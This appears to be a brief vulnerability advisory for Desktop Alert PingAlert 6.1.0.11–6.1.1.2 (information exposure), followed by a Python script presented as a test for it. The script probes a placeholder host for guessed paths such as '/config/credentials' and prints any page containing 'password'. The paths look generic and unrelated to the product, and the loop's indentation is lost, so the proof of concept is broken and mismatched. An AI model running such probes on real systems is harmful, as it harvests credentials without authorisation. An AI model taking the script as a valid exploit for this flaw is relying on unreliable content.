An issue was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2. Sensitive Information is exposed to an Unauthorized Actor.
The following code is for security research and authorized testing only.
python
import requests
target = 'http://target.com'
paths = ['/admin/config', '/api/sensitive', '/config/credentials']
for path in paths:
response = requests.get(f'{target}{path}')
if response.status_code == 200 and 'password' in response.text:
print(f'Found sensitive data at {path}')
print(response.text)